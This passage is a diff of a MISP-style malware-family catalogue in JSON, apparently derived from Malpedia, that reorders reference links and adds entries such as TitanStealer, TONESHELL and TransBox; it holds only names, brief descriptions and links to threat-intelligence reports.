@@ -44851,12 +47225,13 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.tiger_rat",
- "https://securelist.com/andariel-evolves-to-target-south-korea-with-ransomware/102811/",
- "https://www.krcert.or.kr/filedownload.do?attach_file_seq=3277&attach_file_id=EpF3277.pdf",
- "https://www.brighttalk.com/webcast/18282/493986",
+ "https://www.attackiq.com/2023/01/05/emulating-the-highly-sophisticated-north-korean-adversary-lazarus-group/",
+ "https://blogs.vmware.com/security/2021/12/tigerrat-advanced-adversaries-on-the-prowl.html",
"https://threatray.com/wp-content/uploads/2021/12/threatray-establishing-the-tigerrat-and-tigerdownloader-malware-families.pdf",
- "https://blog.talosintelligence.com/2022/09/lazarus-magicrat.html",
- "https://blogs.vmware.com/security/2021/12/tigerrat-advanced-adversaries-on-the-prowl.html"
+ "https://www.brighttalk.com/webcast/18282/493986",
+ "https://www.krcert.or.kr/filedownload.do?attach_file_seq=3277&attach_file_id=EpF3277.pdf",
+ "https://securelist.com/andariel-evolves-to-target-south-korea-with-ransomware/102811/",
+ "https://blog.talosintelligence.com/2022/09/lazarus-magicrat.html"
],
"synonyms": [],
"type": []
@@ -44882,20 +47257,20 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.tinba",
- "http://www.trendmicro.com/cloud-content/us/pdfs/security-intelligence/white-papers/wp_w32-tinba-tinybanker.pdf",
"http://stopmalvertising.com/malware-reports/mini-analysis-of-the-tinybanker-tinba.html",
- "http://contagiodump.blogspot.com/2012/06/amazon.html",
- "http://www.theregister.co.uk/2012/06/04/small_banking_trojan/",
+ "http://www.trendmicro.com/cloud-content/us/pdfs/security-intelligence/white-papers/wp_w32-tinba-tinybanker.pdf",
"https://www.zscaler.com/blogs/research/look-recent-tinba-banking-trojan-variant",
+ "http://www.theregister.co.uk/2012/06/04/small_banking_trojan/",
"https://securityblog.switch.ch/2015/06/18/so-long-and-thanks-for-all-the-domains/",
+ "http://garage4hackers.com/entry.php?b=3086",
"https://www.f5.com/labs/articles/education/banking-trojans-a-reference-guide-to-the-malware-family-tree",
+ "https://blogs.blackberry.com/en/2019/03/blackberry-cylance-vs-tinba-banking-trojan",
+ "http://contagiodump.blogspot.com/2012/06/amazon.html",
+ "http://securityintelligence.com/tinba-malware-reloaded-and-attacking-banks-around-the-world/",
+ "https://www.welivesecurity.com/wp-content/uploads/2020/07/ESET_Threat_Report_Q22020.pdf",
"https://blog.talosintelligence.com/2022/02/threat-roundup-0204-0211.html",
"https://securityintelligence.com/tinba-trojan-sets-its-sights-on-romania/",
- "https://www.welivesecurity.com/wp-content/uploads/2020/07/ESET_Threat_Report_Q22020.pdf",
- "http://securityintelligence.com/tinba-malware-reloaded-and-attacking-banks-around-the-world/",
- "https://adalogics.com/blog/the-state-of-advanced-code-injections",
- "http://garage4hackers.com/entry.php?b=3086",
- "https://blogs.blackberry.com/en/2019/03/blackberry-cylance-vs-tinba-banking-trojan"
+ "https://adalogics.com/blog/the-state-of-advanced-code-injections"
],
"synonyms": [
"Illi",
@@ -44904,15 +47279,6 @@
],
"type": []
},
- "related": [
- {
- "dest-uuid": "75f53ead-1aee-4f91-8cb9-b4170d747cfc",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "similar"
- }
- ],
"uuid": "5eee35b6-bd21-4b67-b198-e9320fcf2c88",
"value": "Tinba"
},
@@ -44922,8 +47288,8 @@
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.tinyloader",
"https://www.proofpoint.com/us/threat-insight/post/abaddonpos-now-targeting-specific-pos-software",
- "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2020CrowdStrikeGlobalThreatReport.pdf",
"https://www.forcepoint.com/sites/default/files/resources/files/report-tinypos-analysis-en.pdf",
+ "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2020CrowdStrikeGlobalThreatReport.pdf",
"https://www.proofpoint.com/us/threat-insight/post/AbaddonPOS-A-New-Point-Of-Sale-Threat-Linked-To-Vawtrak"
],
"synonyms": [],
@@ -44937,16 +47303,17 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.tinymet",
- "https://twitter.com/VK_Intel/status/1273292957429510150",
- "https://www.crowdstrike.com/blog/how-falcon-complete-stopped-a-big-game-hunting-ransomware-attack/",
- "https://www.flashpoint-intel.com/blog/fin7-revisited:-inside-astra-panel-and-sqlrat-malware/",
- "https://www.blueliv.com/cyber-security-and-cyber-threat-intelligence-blog-blueliv/using-qiling-framework-to-unpack-ta505-packed-samples/",
- "https://www.crowdstrike.com/blog/how-falcon-complete-stopped-a-solarwinds-serv-u-exploit-campaign/",
- "https://www.secureworks.com/research/threat-profiles/gold-niagara",
- "https://www.telekom.com/en/blog/group/article/cybersecurity-ta505-s-box-of-chocolate-597672",
"https://ti.qianxin.com/uploads/2020/02/13/cb78386a082f465f259b37dae5df4884.pdf",
+ "https://www.crowdstrike.com/blog/how-falcon-complete-stopped-a-big-game-hunting-ransomware-attack/",
"https://github.com/SherifEldeeb/TinyMet",
- "https://www.fsec.or.kr/common/proc/fsec/bbs/163/fileDownLoad/2297.do"
+ "https://securityintelligence.com/posts/ta505-continues-to-infect-networks-with-sdbbot-rat/",
+ "https://www.flashpoint-intel.com/blog/fin7-revisited:-inside-astra-panel-and-sqlrat-malware/",
+ "https://twitter.com/VK_Intel/status/1273292957429510150",
+ "https://www.secureworks.com/research/threat-profiles/gold-niagara",
+ "https://www.crowdstrike.com/blog/how-falcon-complete-stopped-a-solarwinds-serv-u-exploit-campaign/",
+ "https://www.fsec.or.kr/common/proc/fsec/bbs/163/fileDownLoad/2297.do",
+ "https://www.telekom.com/en/blog/group/article/cybersecurity-ta505-s-box-of-chocolate-597672",
+ "https://www.blueliv.com/cyber-security-and-cyber-threat-intelligence-blog-blueliv/using-qiling-framework-to-unpack-ta505-packed-samples/"
],
"synonyms": [
"TiniMet"
@@ -44961,17 +47328,17 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.tinynuke",
- "https://securityintelligence.com/the-nukebot-trojan-a-bruised-ego-and-a-surprising-source-code-leak/",
- "https://benkowlab.blogspot.de/2017/08/quick-look-at-another-alina-fork-xbot.html",
- "https://krebsonsecurity.com/tag/nuclear-bot/",
- "https://krebsonsecurity.com/2019/12/nuclear-bot-author-arrested-in-sextortion-case/",
- "https://medium.com/csis-techblog/inside-view-of-brazzzersff-infrastructure-89b9188fd145",
"https://asec.ahnlab.com/en/27346/",
- "https://www.bitsighttech.com/blog/break-out-of-the-tinynuke-botnet",
- "https://asec.ahnlab.com/en/32781/",
"https://www.arbornetworks.com/blog/asert/dismantling-nuclear-bot/",
+ "https://asec.ahnlab.com/en/32781/",
+ "https://krebsonsecurity.com/tag/nuclear-bot/",
+ "https://medium.com/csis-techblog/inside-view-of-brazzzersff-infrastructure-89b9188fd145",
"https://securelist.com/the-nukebot-banking-trojan-from-rough-drafts-to-real-threats/78957/",
- "https://forums.juniper.net/t5/Threat-Research/Nukebot-Banking-Trojan-targeting-people-in-France/ba-p/326702"
+ "https://www.bitsighttech.com/blog/break-out-of-the-tinynuke-botnet",
+ "https://forums.juniper.net/t5/Threat-Research/Nukebot-Banking-Trojan-targeting-people-in-France/ba-p/326702",
+ "https://securityintelligence.com/the-nukebot-trojan-a-bruised-ego-and-a-surprising-source-code-leak/",
+ "https://krebsonsecurity.com/2019/12/nuclear-bot-author-arrested-in-sextortion-case/",
+ "https://benkowlab.blogspot.de/2017/08/quick-look-at-another-alina-fork-xbot.html"
],
"synonyms": [
"MicroBankingTrojan",
@@ -44989,21 +47356,12 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.tinytyphon",
- "https://www.forcepoint.com/sites/default/files/resources/files/forcepoint-security-labs-monsoon-analysis-report.pdf",
- "https://www.forcepoint.com/blog/x-labs/monsoon-analysis-apt-campaign"
+ "https://www.forcepoint.com/blog/x-labs/monsoon-analysis-apt-campaign",
+ "https://www.forcepoint.com/sites/default/files/resources/files/forcepoint-security-labs-monsoon-analysis-report.pdf"
],
"synonyms": [],
"type": []
},
- "related": [
- {
- "dest-uuid": "1b591586-e1ef-4a32-8dae-791aca5ddf41",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "similar"
- }
- ],
"uuid": "d2414f4a-1eda-4d80-84d3-ed130ca14e3c",
"value": "TinyTyphon"
},
@@ -45012,22 +47370,13 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.tinyzbot",
- "https://www.secureworks.com/research/threat-profiles/cobalt-gypsy",
"https://www.cylance.com/content/dam/cylance/pages/operation-cleaver/Cylance_Operation_Cleaver_Report.pdf",
- "https://know.netenrich.com/threatintel/threat_actor/Cutting%20Kitten"
+ "https://know.netenrich.com/threatintel/threat_actor/Cutting%20Kitten",
+ "https://www.secureworks.com/research/threat-profiles/cobalt-gypsy"
],
"synonyms": [],
"type": []
},
- "related": [
- {
- "dest-uuid": "e2cc27a2-4146-4f08-8e80-114a99204cea",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "similar"
- }
- ],
"uuid": "b933634f-81d0-41ef-bf2f-ea646fc9e59c",
"value": "TinyZbot"
},
@@ -45057,22 +47406,36 @@
"uuid": "c34091df-0df2-4ef6-bf69-c67eb711f6d8",
"value": "Tiop"
},
+ {
+ "description": "Information stealer written in Go.",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.titan_stealer",
+ "https://www.uptycs.com/blog/titan-stealer-telegram-malware-campaign",
+ "https://blog.bushidotoken.net/2022/11/detecting-and-fingerprinting.html"
+ ],
+ "synonyms": [],
+ "type": []
+ },
+ "uuid": "0a98f387-885e-4ad4-b5ab-686f4c06dcf1",
+ "value": "TitanStealer"
+ },
{
"description": "",
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.tmanger",
- "https://insight-jp.nttsecurity.com/post/102gi9b/pandas-new-arsenal-part-1-tmanger",
- "https://decoded.avast.io/luigicamastra/apt-group-targeting-governmental-agencies-in-east-asia",
- "https://vblocalhost.com/uploads/VB2020-20.pdf",
- "https://labs.sentinelone.com/thundercats-hack-the-fsb-your-taxes-didnt-pay-for-this-op/",
- "https://vblocalhost.com/uploads/VB2020-Ozawa-etal.pdf",
- "https://www.welivesecurity.com/2020/12/10/luckymouse-ta428-compromise-able-desktop",
- "https://insight-jp.nttsecurity.com/post/102glv5/pandas-new-arsenal-part-3-smanager",
- "https://www.sentinelone.com/labs/thundercats-hack-the-fsb-your-taxes-didnt-pay-for-this-op",
"https://www.welivesecurity.com/2020/12/10/luckymouse-ta428-compromise-able-desktop/",
+ "https://vblocalhost.com/uploads/VB2020-Ozawa-etal.pdf",
"https://www.youtube.com/watch?v=1WfPlgtfWnQ",
- "https://decoded.avast.io/luigicamastra/apt-group-targeting-governmental-agencies-in-east-asia/"
+ "https://decoded.avast.io/luigicamastra/apt-group-targeting-governmental-agencies-in-east-asia/",
+ "https://insight-jp.nttsecurity.com/post/102glv5/pandas-new-arsenal-part-3-smanager",
+ "https://labs.sentinelone.com/thundercats-hack-the-fsb-your-taxes-didnt-pay-for-this-op/",
+ "https://vblocalhost.com/uploads/VB2020-20.pdf",
+ "https://www.welivesecurity.com/2020/12/10/luckymouse-ta428-compromise-able-desktop",
+ "https://decoded.avast.io/luigicamastra/apt-group-targeting-governmental-agencies-in-east-asia",
+ "https://www.sentinelone.com/labs/thundercats-hack-the-fsb-your-taxes-didnt-pay-for-this-op",
+ "https://insight-jp.nttsecurity.com/post/102gi9b/pandas-new-arsenal-part-1-tmanger"
],
"synonyms": [
"LuckyBack"
@@ -45083,17 +47446,29 @@
"value": "Tmanger"
},
{
- "description": "",
+ "description": "According to PCrisk, Tofsee (also known as Gheg) is a malicious Trojan-type program that is capable of performing DDoS attacks, mining cryptocurrency, sending emails, stealing various account credentials, updating itself, and more.\r\n\r\nCyber criminals mainly use this program as an email-oriented tool (they target users' email accounts), however, having Tofsee installed can also lead to many other problems.",
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.tofsee",
- "https://lokalhost.pl/txt/peering.into.spam.botnets.VirusBulletin2017.pdf",
"https://www.dragos.com/blog/investigating-the-watering-hole-linked-to-the-oldsmar-water-treatment-facility-breach/",
- "https://www.cert.pl/en/news/single/tofsee-en/",
- "https://blog.talosintelligence.com/2022/02/threat-roundup-0204-0211.html",
- "https://www.cert.pl/en/news/single/a-deeper-look-at-tofsee-modules/",
+ "https://blog.checkpoint.com/security/march-2023s-most-wanted-malware-new-emotet-campaign-bypasses-microsoft-blocks-to-distribute-malicious-onenote-files/",
+ "https://info.spamhaus.com/hubfs/Botnet%20Reports/2022%20Q3%20Botnet%20Threat%20Update.pdf",
+ "https://www.spamhaus.com/resource-center/neutralizing-tofsee-spambot-part-1-binary-file-vaccine/",
"https://intel471.com/blog/privateloader-malware",
- "https://zerophagemalware.com/2017/03/24/terror-ek-delivers-tofsee-spambot/"
+ "https://www.virusbulletin.com/virusbulletin/2014/04/tofsee-botnet",
+ "https://www.spamhaus.com/resource-center/neutralizing-tofsee-spambot-part-3-network-based-kill-switch/",
+ "https://gist.github.com/larsborn/0ec24d7b294248c51de0c3335802cbd4",
+ "https://www.spamhaus.com/resource-center/neutralizing-tofsee-spambot-part-2-inmemoryconfig-store-vaccine/",
+ "https://www.govcert.ch/blog/tofsee-spambot-features-.ch-dga-reversal-and-countermesaures/",
+ "https://zerophagemalware.com/2017/03/24/terror-ek-delivers-tofsee-spambot/",
+ "https://blog.talosintelligence.com/2022/02/threat-roundup-0204-0211.html",
+ "https://www.cert.pl/en/news/single/tofsee-en/",
+ "https://blog.talosintelligence.com/tofsee-spam/",
+ "https://web.archive.org/web/20090428005953/http://www.marshal8e6.com/trace/i/Gheg,spambot.897~.asp",
+ "https://info.spamhaus.com/hubfs/Botnet%20Reports/2023%20Q1%20Botnet%20Threat%20Update.pdf",
+ "https://lokalhost.pl/txt/peering.into.spam.botnets.VirusBulletin2017.pdf",
+ "https://www.cert.pl/en/news/single/a-deeper-look-at-tofsee-modules/",
+ "https://www.bitsight.com/blog/tofsee-botnet-proxying-and-mining"
],
"synonyms": [
"Gheg"
@@ -45122,7 +47497,8 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.tomiris",
- "https://securelist.com/darkhalo-after-solarwinds-the-tomiris-connection/104311/"
+ "https://securelist.com/darkhalo-after-solarwinds-the-tomiris-connection/104311/",
+ "https://securelist.com/tomiris-called-they-want-their-turla-malware-back/109552/"
],
"synonyms": [],
"type": []
@@ -45135,9 +47511,9 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.tonedeaf",
- "https://intezer.com/blog-new-iranian-campaign-tailored-to-us-companies-uses-updated-toolset/",
+ "https://research.checkpoint.com/2021/irans-apt34-returns-with-an-updated-arsenal/",
"https://www.fireeye.com/blog/threat-research/2019/07/hard-pass-declining-apt34-invite-to-join-their-professional-network.html",
- "https://research.checkpoint.com/2021/irans-apt34-returns-with-an-updated-arsenal/"
+ "https://intezer.com/blog-new-iranian-campaign-tailored-to-us-companies-uses-updated-toolset/"
],
"synonyms": [],
"type": []
@@ -45145,6 +47521,19 @@
"uuid": "77e29e3a-d4a3-4692-b1f8-38ad6dc1af1d",
"value": "TONEDEAF"
},
+ {
+ "description": "",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.toneshell",
+ "https://www.trendmicro.com/en_us/research/22/k/earth-preta-spear-phishing-governments-worldwide.html"
+ ],
+ "synonyms": [],
+ "type": []
+ },
+ "uuid": "83bfa615-a1d4-4b61-bda0-beb560d24a97",
+ "value": "TONESHELL"
+ },
{
"description": "",
"meta": {
@@ -45159,15 +47548,28 @@
"uuid": "a7590aa5-d9fb-449f-8a5e-5233077b736e",
"value": "Tonnerre"
},
+ {
+ "description": "",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.topinambour",
+ "https://securelist.com/tomiris-called-they-want-their-turla-malware-back/109552/"
+ ],
+ "synonyms": [],
+ "type": []
+ },
+ "uuid": "fcc49738-f801-47ff-977b-9e368bc85273",
+ "value": "Topinambour"
+ },
{
"description": "",
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.torisma",
- "https://www.mcafee.com/blogs/other-blogs/mcafee-labs/operation-north-star-behind-the-scenes/",
+ "http://blog.nsfocus.net/stumbzarus-apt-lazarus/",
"https://blogs.jpcert.or.jp/en/2021/01/Lazarus_malware2.html",
"https://global.ahnlab.com/global/upload/download/asecreport/ASEC%20REPORT_vol.102_ENG%20(4).pdf",
- "http://blog.nsfocus.net/stumbzarus-apt-lazarus/"
+ "https://www.mcafee.com/blogs/other-blogs/mcafee-labs/operation-north-star-behind-the-scenes/"
],
"synonyms": [],
"type": []
@@ -45180,8 +47582,8 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.torrentlocker",
- "https://www.trendmicro.com/content/dam/trendmicro/global/en/research/21/i/ssl-tls-technical-brief/ssl-tls-technical-brief.pdf",
- "http://www.bleepingcomputer.com/forums/t/547708/torrentlocker-ransomware-cracked-and-decrypter-has-been-made/"
+ "http://www.bleepingcomputer.com/forums/t/547708/torrentlocker-ransomware-cracked-and-decrypter-has-been-made/",
+ "https://www.trendmicro.com/content/dam/trendmicro/global/en/research/21/i/ssl-tls-technical-brief/ssl-tls-technical-brief.pdf"
],
"synonyms": [
"Teerac"
@@ -45191,13 +47593,39 @@
"uuid": "7f6cd579-b021-4896-80da-fcc07c35c8b2",
"value": "TorrentLocker"
},
+ {
+ "description": "",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.touchmove",
+ "https://www.mandiant.com/resources/blog/lightshow-north-korea-unc2970"
+ ],
+ "synonyms": [],
+ "type": []
+ },
+ "uuid": "39ecb19e-790b-475b-85db-ef4c7f9c9dce",
+ "value": "TOUCHMOVE"
+ },
+ {
+ "description": "",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.touchshift",
+ "https://www.mandiant.com/resources/blog/lightshow-north-korea-unc2970"
+ ],
+ "synonyms": [],
+ "type": []
+ },
+ "uuid": "accbbc7e-43f1-4232-90be-6c1fe90cbccf",
+ "value": "TOUCHSHIFT"
+ },
{
"description": "",
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.toxiceye",
- "https://www.bollyinside.com/articles/how-rat-malware-is-using-telegram-to-evade-detection/",
- "https://blog.checkpoint.com/2021/04/22/turning-telegram-toxic-new-toxiceye-rat-is-the-latest-to-use-telegram-for-command-control/"
+ "https://blog.checkpoint.com/2021/04/22/turning-telegram-toxic-new-toxiceye-rat-is-the-latest-to-use-telegram-for-command-control/",
+ "https://www.bollyinside.com/articles/how-rat-malware-is-using-telegram-to-evade-detection/"
],
"synonyms": [],
"type": []
@@ -45205,16 +47633,29 @@
"uuid": "0d445373-d520-4b67-9066-72f23452c774",
"value": "ToxicEye"
},
+ {
+ "description": "According to Trend Micro, this is a backdoor abusing the Dropbox API, used by threat actor Earth Yako.",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.transbox",
+ "https://www.trendmicro.com/en_us/research/23/b/invitation-to-secret-event-uncovering-earth-yako-campaigns.html"
+ ],
+ "synonyms": [],
+ "type": []
+ },
+ "uuid": "e4d4af34-835a-4e39-b9e2-eb2456e5fce3",
+ "value": "TransBox"
+ },
{
"description": "tRat is a modular RAT written in Delphi and has appeared in campaigns in September and October of 2018.",
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.trat",
+ "https://ti.qianxin.com/uploads/2020/02/13/cb78386a082f465f259b37dae5df4884.pdf",
"https://www.cert.ssi.gouv.fr/uploads/CERTFR-2020-CTI-009.pdf",
- "https://www.gdatasoftware.com/blog/trat-control-via-smartphone",
- "https://www.cert.ssi.gouv.fr/uploads/CERTFR-2020-CTI-006.pdf",
"https://www.proofpoint.com/us/threat-insight/post/trat-new-modular-rat-appears-multiple-email-campaigns",
- "https://ti.qianxin.com/uploads/2020/02/13/cb78386a082f465f259b37dae5df4884.pdf"
+ "https://www.cert.ssi.gouv.fr/uploads/CERTFR-2020-CTI-006.pdf",
+ "https://www.gdatasoftware.com/blog/trat-control-via-smartphone"
],
"synonyms": [],
"type": []
@@ -45227,9 +47668,9 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.treasurehunter",
- "http://adelmas.com/blog/treasurehunter.php",
"https://www.flashpoint-intel.com/blog/treasurehunter-source-code-leaked/",
- "https://www.fireeye.com/blog/threat-research/2016/03/treasurehunt_a_cust.html"
+ "https://www.fireeye.com/blog/threat-research/2016/03/treasurehunt_a_cust.html",
+ "http://adelmas.com/blog/treasurehunter.php"
],
"synonyms": [
"huntpos"
@@ -45244,280 +47685,284 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.trickbot",
- "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/trickbot-botnet-ransomware-disruption",
- "https://blog.talosintelligence.com/2020/03/trickbot-primer.html",
- "https://f5.com/labs/articles/threat-intelligence/malware/trickbot-expands-global-targets-beyond-banks-and-payment-processors-to-crms",
- "https://www.bleepingcomputer.com/news/security/emotet-trickbot-malware-duo-is-back-infecting-windows-machines/",
- "https://www.fortinet.com/blog/threat-research/global-malicious-spam-campaign-using-black-lives-matter-as-a-lure",
- "https://www.pwc.co.uk/cyber-security/assets/cyber-threats-2019-retrospect.pdf",
- "https://umbrella.cisco.com/blog/navigating-cybersecurity-during-a-pandemic-latest-malware-and-threat-actors",
- "https://www.bleepingcomputer.com/news/security/trickbot-now-steals-windows-active-directory-credentials/",
- "https://www.europol.europa.eu/newsroom/news/12-targeted-for-involvement-in-ransomware-attacks-against-critical-infrastructure",
- "https://www.ic3.gov/Media/News/2022/220120.pdf",
- "https://blog.fraudwatchinternational.com/malware/trickbot-malware-works",
- "https://na.eventscloud.com/file_uploads/6568237bca6dc156e5c5557c5989e97c_CrowdStrikeFal.Con2019_ThroughEyesOfAdversary_J.Ayers.pdf",
- "https://therecord.media/us-arrests-latvian-woman-who-worked-on-trickbot-malware-source-code/",
- "https://www.kryptoslogic.com/blog/2022/01/deep-dive-into-trickbots-web-injection/",
- "https://www.domaintools.com/resources/blog/tracking-a-trickbot-related-ransomware-incident",
- "https://community.riskiq.com/article/111d6005/description",
- "https://thedfirreport.com/2021/01/11/trickbot-still-alive-and-well/",
- "https://thehackernews.com/2022/02/trickbot-gang-likely-shifting.html",
- "https://www.gosecure.net/blog/2021/12/03/trickbot-leverages-zoom-work-from-home-interview-malspam-heavens-gate-and-spamhaus/",
- "https://therecord.media/trickbot-gang-shuts-down-botnet-after-months-of-inactivity/",
- "https://www.blueliv.com/research/trickbot-banking-trojan-using-eflags-as-an-anti-hook-technique/",
- "https://blog.talosintelligence.com/2021/10/threat-hunting-in-large-datasets-by.html",
- "https://www.crowdstrike.com/blog/sin-ful-spiders-wizard-spider-and-lunar-spider-sharing-the-same-web/",
- "https://www.intrinsec.com/deobfuscating-hunting-ostap/",
- "https://www.pwc.co.uk/issues/cyber-security-services/insights/what-is-behind-ransomware-attacks-increase.html",
- "https://www.webroot.com/blog/2018/03/21/trickbot-banking-trojan-adapts-new-module/",
- "https://www.netscout.com/blog/asert/dropping-anchor",
- "https://www.bsi.bund.de/SharedDocs/Downloads/DE/BSI/Publikationen/Lageberichte/Lagebericht2020.pdf?__blob=publicationFile&v=2",
- "https://www.youtube.com/watch?v=EyDiIAt__dI",
- "https://securityintelligence.com/posts/trickbot-survival-instinct-trickboot-version/",
- "https://unit42.paloaltonetworks.com/trickbot-campaign-uses-fake-payroll-emails-to-conduct-phishing-attacks/",
- "https://us-cert.cisa.gov/ncas/alerts/aa21-076a",
- "https://www.cronup.com/post/de-ataque-con-malware-a-incidente-de-ransomware",
- "https://research.checkpoint.com/2021/when-old-friends-meet-again-why-emotet-chose-trickbot-for-rebirth/",
- "https://www.reuters.com/technology/details-another-big-ransomware-group-trickbot-leak-online-experts-say-2022-03-04/",
- "https://threatpost.com/conti-ransomware-decryptor-trickbot-source-code-leaked/178727/",
- "https://www.secdata.com/the-trickbot-and-mikrotik/",
- "https://labs.sentinelone.com/deep-dive-into-trickbot-executor-module-mexec-hidden-anchor-bot-nexus-operations/",
- "https://www.lastline.com/labsblog/evolution-of-excel-4-0-macro-weaponization/",
- "https://unit42.paloaltonetworks.com/wireshark-tutorial-examining-trickbot-infections/",
- "https://www.bitdefender.com/files/News/CaseStudies/study/316/Bitdefender-Whitepaper-TrickBot-en-EN-interactive.pdf",
- "https://threatpost.com/trickbot-amazon-paypal-top-brands/178483/",
- "https://www.cert.pl/en/news/single/detricking-trickbot-loader/",
- "https://www.cert.ssi.gouv.fr/uploads/CERTFR-2020-CTI-009.pdf",
- "https://labs.sentinelone.com/enter-the-maze-demystifying-an-affiliate-involved-in-maze-snow/",
- "https://www.bitdefender.com/files/News/CaseStudies/study/399/Bitdefender-PR-Whitepaper-Trickbot-creat5515-en-EN.pdf",
- "https://redcanary.com/blog/how-one-hospital-thwarted-a-ryuk-ransomware-outbreak/",
- "https://www.breachquest.com/conti-leaks-insight-into-a-ransomware-unicorn/",
- "https://krebsonsecurity.com/2020/10/attacks-aimed-at-disrupting-the-trickbot-botnet/",
- "https://engineering.salesforce.com/easily-identify-malicious-servers-on-the-internet-with-jarm-e095edac525a",
- "https://blog.morphisec.com/trickbot-delivery-method-gets-a-new-upgrade-focusing-on-windows",
- "https://www.deepinstinct.com/2019/07/12/trickbooster-trickbots-email-based-infection-module/",
- "https://osint.fans/service-nsw-russia-association",
- "https://unit42.paloaltonetworks.com/trickbot-updates-password-grabber-module/",
- "https://blog.cyberint.com/ryuk-crypto-ransomware",
- "https://www.justice.gov/opa/pr/officials-announce-international-operation-targeting-transnational-criminal-organization",
- "https://www.microsoft.com/security/blog/2022/05/09/ransomware-as-a-service-understanding-the-cybercrime-gig-economy-and-how-to-protect-yourself",
- "https://www.flashpoint-intel.com/blog/trickbot-account-checking-hybrid-attack-model/",
- "https://www.sophos.com/en-us/medialibrary/pdfs/technical-papers/sophos-2021-threat-report.pdf",
- "https://www.zdnet.com/article/the-malware-that-usually-installs-ransomware-and-you-need-to-remove-right-away/",
- "https://community.riskiq.com/article/04ec92f4",
- "https://blog.lumen.com/a-look-inside-the-trickbot-botnet/",
- "https://attackiq.com/2022/06/15/attack-graph-emulating-the-conti-ransomware-teams-behaviors/",
- "https://blogs.keysight.com/blogs/tech/nwvs.entry.html/2020/12/21/trickbot_a_closerl-TpQ0.html",
- "https://labs.sentinelone.com/building-a-custom-malware-analysis-lab-environment/",
- "https://www.infosecurity-magazine.com/blogs/trickbot-mikrotik-connection/",
- "https://news.sophos.com/en-us/2020/02/18/nearly-a-quarter-of-malware-now-communicates-using-tls/",
- "https://www.trendmicro.com/vinfo/us/security/news/cybercrime-and-digital-threats/evolving-trickbot-adds-detection-evasion-and-screen-locking-features",
- "https://www.govcert.admin.ch/blog/36/severe-ransomware-attacks-against-swiss-smes",
- "https://www.mandiant.com/media/12596/download",
- "https://www.botconf.eu/wp-content/uploads/2016/11/2016-LT09-TrickBot-Adams.pdf",
- "https://redcanary.com/resources/webinars/deep-dive-process-injection/",
- "https://share.vx-underground.org/Conti/",
- "https://www.crowdstrike.com/blog/wizard-spider-adversary-update/",
- "https://www.microsoft.com/security/blog/2022/05/09/ransomware-as-a-service-understanding-the-cybercrime-gig-economy-and-how-to-protect-yourself/",
- "https://www.vkremez.com/2018/11/lets-learn-introducing-latest-trickbot.html",
- "https://blog.morphisec.com/trickbot-uses-a-new-windows-10-uac-bypass",
- "https://sysopfb.github.io/malware/2018/04/16/trickbot-uacme.html",
- "https://www.secureworks.com/blog/trickbot-modifications-target-us-mobile-users",
- "https://mal-eats.net/en/2021/05/11/campo_new_attack_campaign_targeting_japan/",
- "https://www.cybereason.com/blog/triple-threat-emotet-deploys-trickbot-to-steal-data-spread-ryuk-ransomware",
- "https://www.kryptoslogic.com/blog/2021/07/trickbot-and-zeus/",
- "https://threatpost.com/conti-ransomware-v-3-including-decryptor-leaked/179006/",
- "https://www.bleepingcomputer.com/news/security/trickbot-now-uses-a-windows-10-uac-bypass-to-evade-detection/",
- "https://hello.global.ntt/en-us/insights/blog/trickbot-variant-communicating-over-dns",
- "https://blog.malwarebytes.com/threat-analysis/malware-threat-analysis/2018/11/whats-new-trickbot-deobfuscating-elements/",
- "https://ibm.ent.box.com/s/hs5pcayhbbhjvj8di5sqdpbbd88tsh89",
- "https://go.recordedfuture.com/hubfs/reports/cta-2021-1112.pdf",
- "https://cyber.wtf/2020/08/31/trickbot-rdpscandll-password-transof/",
- "https://cybersecurity.att.com/blogs/labs-research/trickbot-bazarloader-in-depth",
- "https://krebsonsecurity.com/2022/03/conti-ransomware-group-diaries-part-ii-the-office/",
- "https://www.proofpoint.com/us/blog/security-briefs/threat-actors-pair-tax-themed-lures-covid-19-healthcare-themes",
- "https://www.fidelissecurity.com/threatgeek/2016/10/trickbot-we-missed-you-dyre",
- "https://www.sentinelone.com/blog/detecting-a-rogue-domain-controller-dcshadow-attack/",
- "https://www.wired.com/story/trickbot-malware-group-internal-messages/",
- "https://content.fireeye.com/m-trends/rpt-m-trends-2020",
